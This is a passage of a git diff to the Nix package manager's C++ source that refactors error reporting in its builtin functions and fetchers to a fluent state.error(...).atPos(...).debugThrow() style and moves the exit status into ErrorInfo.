v) Ignore `__contentAddressed` because fixed output derivations are already content addressed. 
*/ if (outputs.size() != 1 || *(outputs.begin()) != "out") - state.debugThrowLastTrace(Error({ - .msg = hintfmt("multiple outputs are not supported in fixed-output derivations"), - .errPos = state.positions[noPos] - })); + state.error( + "multiple outputs are not supported in fixed-output derivations" + ).atPos(v).debugThrow(); auto h = newHashAllowEmpty(*outputHash, parseHashAlgoOpt(outputHashAlgo)); @@ -1332,10 +1322,8 @@ drvName, Bindings * attrs, Value & v) else if (contentAddressed || isImpure) { if (contentAddressed && isImpure) - throw EvalError({ - .msg = hintfmt("derivation cannot be both content-addressed and impure"), - .errPos = state.positions[noPos] - }); + state.error("derivation cannot be both content-addressed and impure") + .atPos(v).debugThrow(); auto ha = parseHashAlgoOpt(outputHashAlgo).value_or(HashAlgorithm::SHA256); auto method = ingestionMethod.value_or(FileIngestionMethod::Recursive); @@ -1376,10 +1364,10 @@ drvName, Bindings * attrs, Value & v) for (auto & i : outputs) { auto h = get(hashModulo.hashes, i); if (!h) - throw AssertionError({ - .msg = hintfmt("derivation produced no hash for output '%s'", i), - .errPos = state.positions[noPos], - }); + state.error( + "derivation produced no hash for output '%s'", + i + ).atPos(v).debugThrow(); auto outPath = state.store->makeOutputPath(i, *h, drvName); drv.env[i] = state.store->printStorePath(outPath); drv.outputs.insert_or_assign( @@ -1485,10 +1473,10 @@ static RegisterPrimOp primop_toPath({ static void prim_storePath(EvalState & state, const PosIdx pos, Value * * args, Value & v) { if (evalSettings.pureEval) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("'%s' is not allowed in pure evaluation mode", "builtins.storePath"), - .errPos = state.positions[pos] - })); + state.error( + "'%s' is not allowed in pure evaluation mode", + "builtins.storePath" + ).atPos(pos).debugThrow(); NixStringContext context; auto path = state.coerceToPath(pos, *args[0], context, "while evaluating the 
first argument passed to 'builtins.storePath'").path; @@ -1498,10 +1486,8 @@ static void prim_storePath(EvalState & state, const PosIdx pos, Value * * args, if (!state.store->isStorePath(path.abs())) path = CanonPath(canonPath(path.abs(), true)); if (!state.store->isInStore(path.abs())) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("path '%1%' is not in the Nix store", path), - .errPos = state.positions[pos] - })); + state.error("path '%1%' is not in the Nix store", path) + .atPos(pos).debugThrow(); auto path2 = state.store->toStorePath(path.abs()).first; if (!settings.readOnlyMode) state.store->ensurePath(path2); @@ -1616,7 +1602,10 @@ static void prim_readFile(EvalState & state, const PosIdx pos, Value * * args, V auto path = realisePath(state, pos, *args[0]); auto s = path.readFile(); if (s.find((char) 0) != std::string::npos) - state.debugThrowLastTrace(Error("the contents of the file '%1%' cannot be represented as a Nix string", path)); + state.error( + "the contents of the file '%1%' cannot be represented as a Nix string", + path + ).atPos(pos).debugThrow(); StorePathSet refs; if (state.store->isInStore(path.path.abs())) { try { @@ -1673,10 +1662,11 @@ static void prim_findFile(EvalState & state, const PosIdx pos, Value * * args, V auto rewrites = state.realiseContext(context); path = rewriteStrings(path, rewrites); } catch (InvalidPathError & e) { - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("cannot find '%1%', since path '%2%' is not valid", path, e.path), - .errPos = state.positions[pos] - })); + state.error( + "cannot find '%1%', since path '%2%' is not valid", + path, + e.path + ).atPos(pos).debugThrow(); } searchPath.elements.emplace_back(SearchPath::Elem { @@ -1745,10 +1735,7 @@ static void prim_hashFile(EvalState & state, const PosIdx pos, Value * * args, V auto algo = state.forceStringNoCtx(*args[0], pos, "while evaluating the first argument passed to builtins.hashFile"); std::optional ha = parseHashAlgo(algo); if (!ha) - 
state.debugThrowLastTrace(Error({ - .msg = hintfmt("unknown hash algo '%1%'", algo), - .errPos = state.positions[pos] - })); + state.error("unknown hash algorithm '%1%'", algo).atPos(pos).debugThrow(); auto path = realisePath(state, pos, *args[1]); @@ -2068,13 +2055,12 @@ static void prim_toFile(EvalState & state, const PosIdx pos, Value * * args, Val if (auto p = std::get_if(&c.raw)) refs.insert(p->path); else - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt( - "in 'toFile': the file named '%1%' must not contain a reference " - "to a derivation but contains (%2%)", - name, c.to_string()), - .errPos = state.positions[pos] - })); + state.error( + "files created by %1% may not reference derivations, but %2% references %3%", + "builtins.toFile", + name, + c.to_string() + ).atPos(pos).debugThrow(); } auto storePath = settings.readOnlyMode @@ -2243,7 +2229,10 @@ static void addPath( if (!expectedHash || !state.store->isValidPath(*expectedStorePath)) { auto dstPath = fetchToStore(*state.store, path.resolveSymlinks(), name, method, filter.get(), state.repair); if (expectedHash && expectedStorePath != dstPath) - state.debugThrowLastTrace(Error("store path mismatch in (possibly filtered) path added from '%s'", path)); + state.error( + "store path mismatch in (possibly filtered) path added from '%s'", + path + ).atPos(pos).debugThrow(); state.allowAndSetStorePathString(dstPath, v); } else state.allowAndSetStorePathString(*expectedStorePath, v); @@ -2343,16 +2332,15 @@ static void prim_path(EvalState & state, const PosIdx pos, Value * * args, Value else if (n == "sha256") expectedHash = newHashAllowEmpty(state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the `sha256` attribute passed to builtins.path"), HashAlgorithm::SHA256); else - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("unsupported argument '%1%' to 'addPath'", state.symbols[attr.name]), - .errPos = state.positions[attr.pos] - })); + state.error( + "unsupported argument '%1%' to 
'addPath'", + state.symbols[attr.name] + ).atPos(attr.pos).debugThrow(); } if (!path) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("missing required 'path' attribute in the first argument to builtins.path"), - .errPos = state.positions[pos] - })); + state.error( + "missing required 'path' attribute in the first argument to builtins.path" + ).atPos(pos).debugThrow(); if (name.empty()) name = path->baseName(); @@ -2770,10 +2758,7 @@ static void prim_functionArgs(EvalState & state, const PosIdx pos, Value * * arg return; } if (!args[0]->isLambda()) - state.debugThrowLastTrace(TypeError({ - .msg = hintfmt("'functionArgs' requires a function"), - .errPos = state.positions[pos] - })); + state.error("'functionArgs' requires a function").atPos(pos).debugThrow(); if (!args[0]->lambda.fun->hasFormals()) { v.mkAttrs(&state.emptyBindings); @@ -2943,10 +2928,10 @@ static void elemAt(EvalState & state, const PosIdx pos, Value & list, int n, Val { state.forceList(list, pos, "while evaluating the first argument passed to builtins.elemAt"); if (n < 0 || (unsigned int) n >= list.listSize()) - state.debugThrowLastTrace(Error({ - .msg = hintfmt("list index %1% is out of bounds", n), - .errPos = state.positions[pos] - })); + state.error( + "list index %1% is out of bounds", + n + ).atPos(pos).debugThrow(); state.forceValue(*list.listElems()[n], pos); v = *list.listElems()[n]; } @@ -2991,10 +2976,7 @@ static void prim_tail(EvalState & state, const PosIdx pos, Value * * args, Value { state.forceList(*args[0], pos, "while evaluating the first argument passed to builtins.tail"); if (args[0]->listSize() == 0) - state.debugThrowLastTrace(Error({ - .msg = hintfmt("'tail' called on an empty list"), - .errPos = state.positions[pos] - })); + state.error("'tail' called on an empty list").atPos(pos).debugThrow(); state.mkList(v, args[0]->listSize() - 1); for (unsigned int n = 0; n < v.listSize(); ++n) @@ -3251,7 +3233,7 @@ static void prim_genList(EvalState & state, const PosIdx pos, 
Value * * args, Va auto len = state.forceInt(*args[1], pos, "while evaluating the second argument passed to builtins.genList"); if (len < 0) - state.error("cannot create list of size %1%", len).debugThrow(); + state.error("cannot create list of size %1%", len).atPos(pos).debugThrow(); // More strict than striclty (!) necessary, but acceptable // as evaluating map without accessing any values makes little sense. @@ -3568,10 +3550,7 @@ static void prim_div(EvalState & state, const PosIdx pos, Value * * args, Value NixFloat f2 = state.forceFloat(*args[1], pos, "while evaluating the second operand of the division"); if (f2 == 0) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("division by zero"), - .errPos = state.positions[pos] - })); + state.error("division by zero").atPos(pos).debugThrow(); if (args[0]->type() == nFloat || args[1]->type() == nFloat) { v.mkFloat(state.forceFloat(*args[0], pos, "while evaluating the first operand of the division") / f2); @@ -3580,10 +3559,7 @@ static void prim_div(EvalState & state, const PosIdx pos, Value * * args, Value NixInt i2 = state.forceInt(*args[1], pos, "while evaluating the second operand of the division"); /* Avoid division overflow as it might raise SIGFPE. 
*/ if (i1 == std::numeric_limits::min() && i2 == -1) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("overflow in integer division"), - .errPos = state.positions[pos] - })); + state.error("overflow in integer division").atPos(pos).debugThrow(); v.mkInt(i1 / i2); } @@ -3714,10 +3690,7 @@ static void prim_substring(EvalState & state, const PosIdx pos, Value * * args, int start = state.forceInt(*args[0], pos, "while evaluating the first argument (the start offset) passed to builtins.substring"); if (start < 0) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("negative start position in 'substring'"), - .errPos = state.positions[pos] - })); + state.error("negative start position in 'substring'").atPos(pos).debugThrow(); int len = state.forceInt(*args[1], pos, "while evaluating the second argument (the substring length) passed to builtins.substring"); @@ -3782,10 +3755,7 @@ static void prim_hashString(EvalState & state, const PosIdx pos, Value * * args, auto algo = state.forceStringNoCtx(*args[0], pos, "while evaluating the first argument passed to builtins.hashString"); std::optional ha = parseHashAlgo(algo); if (!ha) - state.debugThrowLastTrace(Error({ - .msg = hintfmt("unknown hash algo '%1%'", algo), - .errPos = state.positions[pos] - })); + state.error("unknown hash algorithm '%1%'", algo).atPos(pos).debugThrow(); NixStringContext context; // discarded auto s = state.forceString(*args[1], context, pos, "while evaluating the second argument passed to builtins.hashString"); @@ -3951,15 +3921,13 @@ void prim_match(EvalState & state, const PosIdx pos, Value * * args, Value & v) } catch (std::regex_error & e) { if (e.code() == std::regex_constants::error_space) { // limit is _GLIBCXX_REGEX_STATE_LIMIT for libstdc++ - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("memory limit exceeded by regular expression '%s'", re), - .errPos = state.positions[pos] - })); + state.error("memory limit exceeded by regular expression '%s'", re) + .atPos(pos) + 
.debugThrow(); } else - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("invalid regular expression '%s'", re), - .errPos = state.positions[pos] - })); + state.error("invalid regular expression '%s'", re) + .atPos(pos) + .debugThrow(); } } @@ -4055,15 +4023,13 @@ void prim_split(EvalState & state, const PosIdx pos, Value * * args, Value & v) } catch (std::regex_error & e) { if (e.code() == std::regex_constants::error_space) { // limit is _GLIBCXX_REGEX_STATE_LIMIT for libstdc++ - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("memory limit exceeded by regular expression '%s'", re), - .errPos = state.positions[pos] - })); + state.error("memory limit exceeded by regular expression '%s'", re) + .atPos(pos) + .debugThrow(); } else - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("invalid regular expression '%s'", re), - .errPos = state.positions[pos] - })); + state.error("invalid regular expression '%s'", re) + .atPos(pos) + .debugThrow(); } } @@ -4139,7 +4105,9 @@ static void prim_replaceStrings(EvalState & state, const PosIdx pos, Value * * a state.forceList(*args[0], pos, "while evaluating the first argument passed to builtins.replaceStrings"); state.forceList(*args[1], pos, "while evaluating the second argument passed to builtins.replaceStrings"); if (args[0]->listSize() != args[1]->listSize()) - state.error("'from' and 'to' arguments passed to builtins.replaceStrings have different lengths").atPos(pos).debugThrow(); + state.error( + "'from' and 'to' arguments passed to builtins.replaceStrings have different lengths" + ).atPos(pos).debugThrow(); std::vector from; from.reserve(args[0]->listSize()); diff --git a/src/libexpr/primops/context.cc b/src/libexpr/primops/context.cc index db940f277..1eec8b316 100644 --- a/src/libexpr/primops/context.cc +++ b/src/libexpr/primops/context.cc @@ -98,30 +98,30 @@ static void prim_addDrvOutputDependencies(EvalState & state, const PosIdx pos, V auto contextSize = context.size(); if (contextSize != 1) { - 
throw EvalError({ - .msg = hintfmt("context of string '%s' must have exactly one element, but has %d", *s, contextSize), - .errPos = state.positions[pos] - }); + state.error( + "context of string '%s' must have exactly one element, but has %d", + *s, + contextSize + ).atPos(pos).debugThrow(); } NixStringContext context2 { (NixStringContextElem { std::visit(overloaded { [&](const NixStringContextElem::Opaque & c) -> NixStringContextElem::DrvDeep { if (!c.path.isDerivation()) { - throw EvalError({ - .msg = hintfmt("path '%s' is not a derivation", - state.store->printStorePath(c.path)), - .errPos = state.positions[pos], - }); + state.error( + "path '%s' is not a derivation", + state.store->printStorePath(c.path) + ).atPos(pos).debugThrow(); } return NixStringContextElem::DrvDeep { .drvPath = c.path, }; }, [&](const NixStringContextElem::Built & c) -> NixStringContextElem::DrvDeep { - throw EvalError({ - .msg = hintfmt("`addDrvOutputDependencies` can only act on derivations, not on a derivation output such as '%1%'", c.output), - .errPos = state.positions[pos], - }); + state.error( + "`addDrvOutputDependencies` can only act on derivations, not on a derivation output such as '%1%'", + c.output + ).atPos(pos).debugThrow(); }, [&](const NixStringContextElem::DrvDeep & c) -> NixStringContextElem::DrvDeep { /* Reuse original item because we want this to be idempotent. 
*/ @@ -261,10 +261,10 @@ static void prim_appendContext(EvalState & state, const PosIdx pos, Value * * ar for (auto & i : *args[1]->attrs) { const auto & name = state.symbols[i.name]; if (!state.store->isStorePath(name)) - throw EvalError({ - .msg = hintfmt("context key '%s' is not a store path", name), - .errPos = state.positions[i.pos] - }); + state.error( + "context key '%s' is not a store path", + name + ).atPos(i.pos).debugThrow(); auto namePath = state.store->parseStorePath(name); if (!settings.readOnlyMode) state.store->ensurePath(namePath); @@ -281,10 +281,10 @@ static void prim_appendContext(EvalState & state, const PosIdx pos, Value * * ar if (iter != i.value->attrs->end()) { if (state.forceBool(*iter->value, iter->pos, "while evaluating the `allOutputs` attribute of a string context")) { if (!isDerivation(name)) { - throw EvalError({ - .msg = hintfmt("tried to add all-outputs context of %s, which is not a derivation, to a string", name), - .errPos = state.positions[i.pos] - }); + state.error( + "tried to add all-outputs context of %s, which is not a derivation, to a string", + name + ).atPos(i.pos).debugThrow(); } context.emplace(NixStringContextElem::DrvDeep { .drvPath = namePath, @@ -296,10 +296,10 @@ static void prim_appendContext(EvalState & state, const PosIdx pos, Value * * ar if (iter != i.value->attrs->end()) { state.forceList(*iter->value, iter->pos, "while evaluating the `outputs` attribute of a string context"); if (iter->value->listSize() && !isDerivation(name)) { - throw EvalError({ - .msg = hintfmt("tried to add derivation output context of %s, which is not a derivation, to a string", name), - .errPos = state.positions[i.pos] - }); + state.error( + "tried to add derivation output context of %s, which is not a derivation, to a string", + name + ).atPos(i.pos).debugThrow(); } for (auto elem : iter->value->listItems()) { auto outputName = state.forceStringNoCtx(*elem, iter->pos, "while evaluating an output name within a string context"); diff 
--git a/src/libexpr/primops/fetchClosure.cc b/src/libexpr/primops/fetchClosure.cc index 27147a5d1..5806b3ff9 100644 --- a/src/libexpr/primops/fetchClosure.cc +++ b/src/libexpr/primops/fetchClosure.cc @@ -27,7 +27,7 @@ static void runFetchClosureWithRewrite(EvalState & state, const PosIdx pos, Stor state.store->printStorePath(fromPath), state.store->printStorePath(rewrittenPath), state.store->printStorePath(*toPathMaybe)), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); if (!toPathMaybe) throw Error({ @@ -36,7 +36,7 @@ static void runFetchClosureWithRewrite(EvalState & state, const PosIdx pos, Stor "Use this value for the 'toPath' attribute passed to 'fetchClosure'", state.store->printStorePath(fromPath), state.store->printStorePath(rewrittenPath)), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); } @@ -54,7 +54,7 @@ static void runFetchClosureWithRewrite(EvalState & state, const PosIdx pos, Stor "The 'toPath' value '%s' is input-addressed, so it can't possibly be the result of rewriting to a content-addressed path.\n\n" "Set 'toPath' to an empty string to make Nix report the correct content-addressed path.", state.store->printStorePath(toPath)), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); } @@ -80,7 +80,7 @@ static void runFetchClosureWithContentAddressedPath(EvalState & state, const Pos "to the 'fetchClosure' arguments.\n\n" "Note that to ensure authenticity input-addressed store paths, users must configure a trusted binary cache public key on their systems. 
This is not needed for content-addressed paths.", state.store->printStorePath(fromPath)), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); } @@ -103,7 +103,7 @@ static void runFetchClosureWithInputAddressedPath(EvalState & state, const PosId "The store object referred to by 'fromPath' at '%s' is not input-addressed, but 'inputAddressed' is set to 'true'.\n\n" "Remove the 'inputAddressed' attribute (it defaults to 'false') to expect 'fromPath' to be content-addressed", state.store->printStorePath(fromPath)), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); } @@ -154,14 +154,14 @@ static void prim_fetchClosure(EvalState & state, const PosIdx pos, Value * * arg else throw Error({ .msg = hintfmt("attribute '%s' isn't supported in call to 'fetchClosure'", attrName), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); } if (!fromPath) throw Error({ .msg = hintfmt("attribute '%s' is missing in call to 'fetchClosure'", "fromPath"), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); bool inputAddressed = inputAddressedMaybe.value_or(false); @@ -172,14 +172,14 @@ static void prim_fetchClosure(EvalState & state, const PosIdx pos, Value * * arg .msg = hintfmt("attribute '%s' is set to true, but '%s' is also set. 
Please remove one of them", "inputAddressed", "toPath"), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); } if (!fromStoreUrl) throw Error({ .msg = hintfmt("attribute '%s' is missing in call to 'fetchClosure'", "fromStore"), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); auto parsedURL = parseURL(*fromStoreUrl); @@ -189,13 +189,13 @@ static void prim_fetchClosure(EvalState & state, const PosIdx pos, Value * * arg !(getEnv("_NIX_IN_TEST").has_value() && parsedURL.scheme == "file")) throw Error({ .msg = hintfmt("'fetchClosure' only supports http:// and https:// stores"), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); if (!parsedURL.query.empty()) throw Error({ .msg = hintfmt("'fetchClosure' does not support URL query parameters (in '%s')", *fromStoreUrl), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); auto fromStore = openStore(parsedURL.to_string()); diff --git a/src/libexpr/primops/fetchMercurial.cc b/src/libexpr/primops/fetchMercurial.cc index 58fe6f173..bb029b5b3 100644 --- a/src/libexpr/primops/fetchMercurial.cc +++ b/src/libexpr/primops/fetchMercurial.cc @@ -38,17 +38,11 @@ static void prim_fetchMercurial(EvalState & state, const PosIdx pos, Value * * a else if (n == "name") name = state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the `name` attribute passed to builtins.fetchMercurial"); else - throw EvalError({ - .msg = hintfmt("unsupported argument '%s' to 'fetchMercurial'", state.symbols[attr.name]), - .errPos = state.positions[attr.pos] - }); + state.error("unsupported argument '%s' to 'fetchMercurial'", state.symbols[attr.name]).atPos(attr.pos).debugThrow(); } if (url.empty()) - throw EvalError({ - .msg = hintfmt("'url' argument required"), - .errPos = state.positions[pos] - }); + state.error("'url' argument required").atPos(pos).debugThrow(); } else url = state.coerceToString(pos, *args[0], context, diff --git a/src/libexpr/primops/fetchTree.cc 
b/src/libexpr/primops/fetchTree.cc index a943095bb..1997d5513 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -100,16 +100,14 @@ static void fetchTree( if (auto aType = args[0]->attrs->get(state.sType)) { if (type) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("unexpected attribute 'type'"), - .errPos = state.positions[pos] - })); + state.error( + "unexpected attribute 'type'" + ).atPos(pos).debugThrow(); type = state.forceStringNoCtx(*aType->value, aType->pos, "while evaluating the `type` attribute passed to builtins.fetchTree"); } else if (!type) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("attribute 'type' is missing in call to 'fetchTree'"), - .errPos = state.positions[pos] - })); + state.error( + "attribute 'type' is missing in call to 'fetchTree'" + ).atPos(pos).debugThrow(); attrs.emplace("type", type.value()); @@ -132,8 +130,8 @@ static void fetchTree( attrs.emplace(state.symbols[attr.name], printValueAsJSON(state, true, *attr.value, pos, context).dump()); } else - state.debugThrowLastTrace(TypeError("fetchTree argument '%s' is %s while a string, Boolean or integer is expected", - state.symbols[attr.name], showType(*attr.value))); + state.error("fetchTree argument '%s' is %s while a string, Boolean or integer is expected", + state.symbols[attr.name], showType(*attr.value)).debugThrow(); } if (params.isFetchGit && !attrs.contains("exportIgnore") && (!attrs.contains("submodules") || !*fetchers::maybeGetBoolAttr(attrs, "submodules"))) { @@ -142,10 +140,9 @@ static void fetchTree( if (!params.allowNameArgument) if (auto nameIter = attrs.find("name"); nameIter != attrs.end()) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("attribute 'name' isn’t supported in call to 'fetchTree'"), - .errPos = state.positions[pos] - })); + state.error( + "attribute 'name' isn’t supported in call to 'fetchTree'" + ).atPos(pos).debugThrow(); input = fetchers::Input::fromAttrs(std::move(attrs)); } else { @@ 
-163,10 +160,9 @@ static void fetchTree( input = fetchers::Input::fromAttrs(std::move(attrs)); } else { if (!experimentalFeatureSettings.isEnabled(Xp::Flakes)) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("passing a string argument to 'fetchTree' requires the 'flakes' experimental feature"), - .errPos = state.positions[pos] - })); + state.error( + "passing a string argument to 'fetchTree' requires the 'flakes' experimental feature" + ).atPos(pos).debugThrow(); input = fetchers::Input::fromURL(url); } } @@ -175,10 +171,14 @@ static void fetchTree( input = lookupInRegistries(state.store, input).first; if (evalSettings.pureEval && !input.isLocked()) { + auto fetcher = "fetchTree"; if (params.isFetchGit) - state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchGit' requires a locked input, at %s", state.positions[pos])); - else - state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchTree' requires a locked input, at %s", state.positions[pos])); + fetcher = "fetchGit"; + + state.error( + "in pure evaluation mode, %s requires a locked input", + fetcher + ).atPos(pos).debugThrow(); } state.checkURI(input.toURLString()); @@ -432,17 +432,13 @@ static void fetch(EvalState & state, const PosIdx pos, Value * * args, Value & v else if (n == "name") name = state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the name of the content we should fetch"); else - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("unsupported argument '%s' to '%s'", n, who), - .errPos = state.positions[attr.pos] - })); + state.error("unsupported argument '%s' to '%s'", n, who) + .atPos(pos).debugThrow(); } if (!url) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("'url' argument required"), - .errPos = state.positions[pos] - })); + state.error( + "'url' argument required").atPos(pos).debugThrow(); } else url = state.forceStringNoCtx(*args[0], pos, "while evaluating the url we should fetch"); @@ -455,7 +451,7 @@ static void fetch(EvalState 
& state, const PosIdx pos, Value * * args, Value & v name = baseNameOf(*url); if (evalSettings.pureEval && !expectedHash) - state.debugThrowLastTrace(EvalError("in pure evaluation mode, '%s' requires a 'sha256' argument", who)); + state.error("in pure evaluation mode, '%s' requires a 'sha256' argument", who).atPos(pos).debugThrow(); // early exit if pinned and already in the store if (expectedHash && expectedHash->algo == HashAlgorithm::SHA256) { @@ -484,9 +480,15 @@ static void fetch(EvalState & state, const PosIdx pos, Value * * args, Value & v auto hash = unpack ? state.store->queryPathInfo(storePath)->narHash : hashFile(HashAlgorithm::SHA256, state.store->toRealPath(storePath)); - if (hash != *expectedHash) - state.debugThrowLastTrace(EvalError((unsigned int) 102, "hash mismatch in file downloaded from '%s':\n specified: %s\n got: %s", - *url, expectedHash->to_string(HashFormat::Nix32, true), hash.to_string(HashFormat::Nix32, true))); + if (hash != *expectedHash) { + state.error( + "hash mismatch in file downloaded from '%s':\n specified: %s\n got: %s", + *url, + expectedHash->to_string(HashFormat::Nix32, true), + hash.to_string(HashFormat::Nix32, true) + ).withExitStatus(102) + .debugThrow(); + } } state.allowAndSetStorePathString(storePath, v); diff --git a/src/libexpr/primops/fromTOML.cc b/src/libexpr/primops/fromTOML.cc index 2f4d4022e..94be7960a 100644 --- a/src/libexpr/primops/fromTOML.cc +++ b/src/libexpr/primops/fromTOML.cc @@ -83,10 +83,7 @@ static void prim_fromTOML(EvalState & state, const PosIdx pos, Value * * args, V try { visit(val, toml::parse(tomlStream, "fromTOML" /* the "filename" */)); } catch (std::exception & e) { // TODO: toml::syntax_error - throw EvalError({ - .msg = hintfmt("while parsing a TOML string: %s", e.what()), - .errPos = state.positions[pos] - }); + state.error("while parsing TOML: %s", e.what()).atPos(pos).debugThrow(); } } diff --git a/src/libexpr/value-to-json.cc b/src/libexpr/value-to-json.cc index 74b3ebf13..b2f116390 
100644 --- a/src/libexpr/value-to-json.cc +++ b/src/libexpr/value-to-json.cc @@ -80,7 +80,7 @@ json printValueAsJSON(EvalState & state, bool strict, try { out.push_back(printValueAsJSON(state, strict, *elem, pos, context, copyToStore)); } catch (Error & e) { - e.addTrace({}, + e.addTrace(state.positions[pos], hintfmt("while evaluating list element at index %1%", i)); throw; } @@ -99,13 +99,12 @@ json printValueAsJSON(EvalState & state, bool strict, case nThunk: case nFunction: - auto e = TypeError({ - .msg = hintfmt("cannot convert %1% to JSON", showType(v)), - .errPos = state.positions[v.determinePos(pos)] - }); - e.addTrace(state.positions[pos], hintfmt("message for the trace")); - state.debugThrowLastTrace(e); - throw e; + state.error( + "cannot convert %1% to JSON", + showType(v) + ) + .atPos(v.determinePos(pos)) + .debugThrow(); } return out; } @@ -119,7 +118,8 @@ void printValueAsJSON(EvalState & state, bool strict, json ExternalValueBase::printValueAsJSON(EvalState & state, bool strict, NixStringContext & context, bool copyToStore) const { - state.debugThrowLastTrace(TypeError("cannot convert %1% to JSON", showType())); + state.error("cannot convert %1% to JSON", showType()) + .debugThrow(); } diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh index 214d52271..e7aea4949 100644 --- a/src/libexpr/value.hh +++ b/src/libexpr/value.hh @@ -105,7 +105,7 @@ class ExternalValueBase * Coerce the value to a string. Defaults to uncoercable, i.e. throws an * error. */ - virtual std::string coerceToString(const Pos & pos, NixStringContext & context, bool copyMore, bool copyToStore) const; + virtual std::string coerceToString(EvalState & state, const PosIdx & pos, NixStringContext & context, bool copyMore, bool copyToStore) const; /** * Compare to another value of the same type. 
Defaults to uncomparable, diff --git a/src/libmain/shared.cc b/src/libmain/shared.cc index 862ef355b..7b9b3c5b5 100644 --- a/src/libmain/shared.cc +++ b/src/libmain/shared.cc @@ -340,7 +340,7 @@ int handleExceptions(const std::string & programName, std::function fun) return 1; } catch (BaseError & e) { logError(e.info()); - return e.status; + return e.info().status; } catch (std::bad_alloc & e) { printError(error + "out of memory"); return 1; diff --git a/src/libstore/build/entry-points.cc b/src/libstore/build/entry-points.cc index 7f0a05d5d..d4bead28e 100644 --- a/src/libstore/build/entry-points.cc +++ b/src/libstore/build/entry-points.cc @@ -33,7 +33,7 @@ void Store::buildPaths(const std::vector & reqs, BuildMode buildMod } if (failed.size() == 1 && ex) { - ex->status = worker.failingExitStatus(); + ex->withExitStatus(worker.failingExitStatus()); throw std::move(*ex); } else if (!failed.empty()) { if (ex) logError(ex->info()); @@ -104,7 +104,7 @@ void Store::ensurePath(const StorePath & path) if (goal->exitCode != Goal::ecSuccess) { if (goal->ex) { - goal->ex->status = worker.failingExitStatus(); + goal->ex->withExitStatus(worker.failingExitStatus()); throw std::move(*goal->ex); } else throw Error(worker.failingExitStatus(), "path '%s' does not exist and cannot be created", printStorePath(path)); diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc index 27ad14ed4..8db93fa39 100644 --- a/src/libstore/daemon.cc +++ b/src/libstore/daemon.cc @@ -119,7 +119,7 @@ struct TunnelLogger : public Logger if (GET_PROTOCOL_MINOR(clientVersion) >= 26) { to << STDERR_ERROR << *ex; } else { - to << STDERR_ERROR << ex->what() << ex->status; + to << STDERR_ERROR << ex->what() << ex->info().status; } } } diff --git a/src/libutil/error.cc b/src/libutil/error.cc index 1f0cb08c9..e4e50d73b 100644 --- a/src/libutil/error.cc +++ b/src/libutil/error.cc @@ -335,7 +335,7 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s * try { * e->eval(*this, 
env, v); * if (v.type() != nAttrs) - * throwTypeError("expected a set but found %1%", v); + * error("expected a set but found %1%", v); * } catch (Error & e) { * e.addTrace(pos, errorCtx); * throw; @@ -349,7 +349,7 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s * e->eval(*this, env, v); * try { * if (v.type() != nAttrs) - * throwTypeError("expected a set but found %1%", v); + * error("expected a set but found %1%", v); * } catch (Error & e) { * e.addTrace(pos, errorCtx); * throw; @@ -411,7 +411,7 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s oss << einfo.msg << "\n"; - printPosMaybe(oss, "", einfo.errPos); + printPosMaybe(oss, "", einfo.pos); auto suggestions = einfo.suggestions.trim(); if (!suggestions.suggestions.empty()) { diff --git a/src/libutil/error.hh b/src/libutil/error.hh index 764fac1ce..9f9302020 100644 --- a/src/libutil/error.hh +++ b/src/libutil/error.hh @@ -84,9 +84,14 @@ inline bool operator>=(const Trace& lhs, const Trace& rhs); struct ErrorInfo { Verbosity level; hintformat msg; - std::shared_ptr errPos; + std::shared_ptr pos; std::list traces; + /** + * Exit status. + */ + unsigned int status = 1; + Suggestions suggestions; static std::optional programName; @@ -103,18 +108,21 @@ class BaseError : public std::exception protected: mutable ErrorInfo err; + /** + * Cached formatted contents of `err.msg`. + */ mutable std::optional what_; + /** + * Format `err.msg` and set `what_` to the resulting value. + */ const std::string & calcWhat() const; public: - unsigned int status = 1; // exit status - BaseError(const BaseError &) = default; template BaseError(unsigned int status, const Args & ... args) - : err { .level = lvlError, .msg = hintfmt(args...) 
